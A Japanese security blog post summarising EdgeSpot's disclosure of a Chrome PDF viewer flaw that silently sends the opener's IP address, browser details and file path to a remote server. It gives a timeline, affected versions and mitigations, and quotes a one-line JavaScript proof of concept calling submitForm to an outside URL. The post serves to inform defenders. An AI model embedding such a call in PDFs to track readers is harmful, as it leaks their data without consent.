piyolog

piyokangoの備忘録です。セキュリティの出来事を中心にまとめています。このサイトはGoogle Analyticsを利用しています。

Google Chrome PDFビューワーの情報漏えいの脆弱性についてまとめてみた

Exploit検出のサービスを公開しているEdgeSpotはChromeのPDFビューワーに情報漏えいの脆弱性が確認されたとして不具合に係る情報を公開しました。ここでは関連する情報をまとめます。

脆弱性の概要

EdgeSpotがChrome PDFビューワーの情報漏えいの脆弱性を次の記事にまとめている。
blog.edgespot.io

概要は以下の通り。

影響 ユーザーが意図せずHTTPリクエストを送出し、情報漏えいする恐れ
影響を受ける対象 Google Chrome
(72.0.3626.119で発生を確認)
脆弱性の名称 無し
CVE 確認できず
PoC インターネット上で脆弱性の利用が既に確認されている。
対策 2019/3/1時点で未修正。
修正されるまでAdobe製のPDFリーダーの利用を推奨。
2019年4月下旬ころ修正の予定と発見者は報告。
  • Edge、Adobe Acrobat Reaer DC、Foxit Readerは脆弱性が発現しないことを確認済。
  • Adobe Acrobat Reader DC(既定)の場合はブロックしたと警告が表示される。

f:id:piyokango:20190302032820p:plain

脆弱性で漏えいする恐れのある情報

  • EdgeSpotは次の3つの情報が外部に漏えいする恐れがあると指摘。
No 項目 補足
1 開封者のIPアドレス HTTPリクエストが飛ぶため
2 OS、Chromeのバージョン情報等 HTTPヘッダに含まれるため
3 PDF格納先のフルパス(ユーザー名が含まれる恐れ) HTTP ペイロードに含まれるため
  • 例えば次のように情報を送信する。

f:id:piyokango:20190301161328p:plain

経緯

日時 出来事
2018年12月下旬以降 EdgeSpotが脆弱性を利用するPDFの検体を発見
2018年12月26日 調査結果をGoogleへ報告
2019年2月12日まで この脆弱性に関連する多数の検体を検出
2019年2月14日 GoogleからEdgeSpotに対しChromeの修正は4月下旬見込みとの連絡
2019年2月26日 EdgeSpotがChrome PDFビューワーの脆弱性を公開。
2019年2月28日 EdgeSpotがメディアの報道にいくつか誤りがあるとして情報をアップデート。

実証コード(PoC)

  • EdgeSpotはPDFのJavaScript APIにおいて、次のPoCで再現することを確認している。
this.submitForm('http://google.com/test')

脆弱性を利用しているとみられるトラッキングサービス

  • 「Re@dNotify」というトラッキングサービスで利用されている可能性がある。

f:id:piyokango:20190301162312p:plain

  • 添付ファイルを用いた場合のトラッキング設定画面

f:id:piyokango:20190301161440p:plain

更新履歴

  • 2019年3月1日 PM 新規作成